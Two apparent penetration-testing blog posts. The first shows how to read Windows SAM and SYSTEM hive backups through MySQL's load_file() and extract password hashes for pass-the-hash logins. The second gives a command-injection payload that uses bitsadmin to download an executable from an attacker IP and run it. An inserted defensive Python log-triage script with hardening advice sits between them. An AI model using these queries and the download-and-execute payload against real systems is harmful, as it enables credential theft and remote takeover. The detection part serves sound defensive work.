Tuesday, June 25, 2013

Pulling Windows Hashes Using MySQL

Here's the setup:

-Obtain access to a MySQL database
-Database user has privileges (including File privileges)
-MySQL database is running on a Windows Server 2003 OS
-Cannot compile a UDF (User Defined Function) to allow command execution via MySQL, since we have no shell access, only access to the database

What do we need to do? We need to move from the database to the OS. We need to compromise Windows accounts...

How are we going to do this?

With help from a Chinese site that no longer seems to be up (...weird?), and quite a bit of googling, I found a way to pull binary files (most importantly the SAM and SYSTEM backup files) from the underlying OS using MySQL's built-in load_file() function.

Here are the steps:

-Convert the binary file to hex
-Pull it off the machine using the database's load_file function
-Save it to a local file
-Convert the hex back into binary
-Yank hashes out of your perfectly good SAM file
-Happy dance

First we need to verify that we have FILE privileges on the target machine:


Now let's see if the machine has the backups of the SAM and SYSTEM files. On Windows XP/2003, the backup files are in C:\windows\repair\.

If you can get to these files, you will see a bunch of junk output to the screen. Once the query finishes, it will look something like this:





So what? We can just save that garbled binary output straight from MySQL and use it, right? Wrong.

First we need to modify our select statement so that the file contents come back as hex. We will do this with MySQL's hex() function:


select hex(load_file('c:/windows/repair/SAM'));


We also need to dump the results to a text file on our local system so that we can work with it. After some basic googling I made a quick Python script to do this for me. You can find it here. *Note: you will need to edit my script.

Now that we have our hex-encoded SAM and SYSTEM files on our attacking machine, we need to convert the file contents back into binary. I found an awesome Perl script to do exactly that here (thanks Dr. Herong Yang :) ).


perl hex2bin.pl SAM.txt SAM
perl hex2bin.pl SYSTEM.txt SYSTEM

We should now have perfectly usable SAM and SYSTEM binary files. We can now try to pull the hashes with bkhive and samdump2 (other tools such as Cain can do this as well).


Now pass that hash, and if the admin has been lazy, you will be able to log in.


Voilà
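From the defender's side, the load_file()/hex() reads described in this post leave a distinctive trail in MySQL's general query log. The following triage script is an added example (not part of the original post) that runs over constructed general-log lines and flags load_file() reads of hive backups, hex-wrapped binary reads, and FILE-privilege enumeration:

```python
import re

# Constructed sample lines in the shape of a MySQL 5.x general query log
# (date time <TAB> thread id <SPACE> command <TAB> statement); not real data.
SAMPLE_LOG = """\
130625 10:00:01\t    5 Query\tselect 1
130625 10:00:02\t    5 Query\tselect file_priv from mysql.user where user='web'
130625 10:00:03\t    5 Query\tselect load_file('c:/windows/repair/SAM')
130625 10:00:04\t    5 Query\tselect hex(load_file('c:/windows/repair/SYSTEM'))
130625 10:00:05\t    5 Query\tselect hex(load_file('c:/inetpub/wwwroot/web.config'))
130625 10:00:06\t    6 Query\tselect name from products
"""

# Registry hives and the XP/2003 backup copies under \windows\repair named in the post.
HIVE_PATH = re.compile(
    r"[\\/](windows|winnt)[\\/](repair|system32[\\/]config)[\\/](sam|system|security)\b", re.I)
LOAD_FILE = re.compile(r"load_file\s*\(", re.I)
HEX_LOAD_FILE = re.compile(r"hex\s*\(\s*load_file", re.I)   # hex() wrapped around a binary read
PRIV_RECON = re.compile(r"\bfile_priv\b", re.I)            # checking for the FILE privilege
LOG_LINE = re.compile(r"^(?P<ts>\S+ \S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<sql>.*)$")


def triage_general_log(text):
    """Return (thread_id, severity, reason, sql) tuples for suspicious statements."""
    findings = []
    for raw in text.splitlines():
        m = LOG_LINE.match(raw)
        if not m or m.group("cmd") != "Query":
            continue                      # only SQL statements are of interest here
        sql, thread = m.group("sql"), int(m.group("thread"))
        if LOAD_FILE.search(sql):
            if HIVE_PATH.search(sql):
                sev, why = "critical", "load_file() on a registry hive or hive backup"
            elif HEX_LOAD_FILE.search(sql):
                sev, why = "high", "hex-wrapped load_file(): binary file exfiltration pattern"
            else:
                sev, why = "medium", "load_file() read of an OS file"
            findings.append((thread, sev, why, sql))
        elif PRIV_RECON.search(sql):
            findings.append((thread, "low", "enumeration of the FILE privilege", sql))
    return findings


if __name__ == "__main__":
    for thread, sev, why, sql in triage_general_log(SAMPLE_LOG):
        print(f"thread {thread} [{sev}] {why}: {sql}")
```

Detection is the fallback; setting MySQL's secure_file_priv to a restricted directory (or leaving it empty to disable file reads) and not granting FILE to application accounts removes this read path altogether.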



Friday, June 7, 2013

Retrieving Elusive Command Output part 2

I can retrieve files using the same method as... Windows Update??

In an earlier post, I described one possible way to upgrade a blind command-execution vulnerability to an interactive shell using only native Windows commands. In this post I will ultimately accomplish the same goal, just in a different way: using the same method that Windows Update uses to pull files, a tool called bitsadmin.

This is not a new idea, as it has been documented elsewhere (I think @mubix and @carnal0wnage might have mentioned it at Derbycon), but it just sparked my interest after I saw a tweet from @brutelogic, so I wanted to do a quick write up on it.

We will use the same scenario as the previous post: a vulnerable web application where we have confirmed command injection (via ping/DNS, etc.) but are unable to view our command output.

Once we have generated/selected the executable to be downloaded, we will need to serve it on our attacking machine. We will inject the command the same way as before:

127.0.0.1 | cmd.exe /c bitsadmin /transfer booyah http://192.168.2.105/boom.exe c:\%homepath%\boom.exe & c:\%homepath%\boom.exe

"booyah" is simply the bitsadmin job name and then we provide the command the location of the file to grab, followed by where to save the file and what to save it as. I use the %homepath% variable to be sure the user we are running as has permissions to write to the folder. We then append the command to execute the file as well.

**Note that bitsadmin needs a full path when you provide the location to save the file, or else it will throw an error.

Once the transfer has completed, our payload executes and...



Booyah.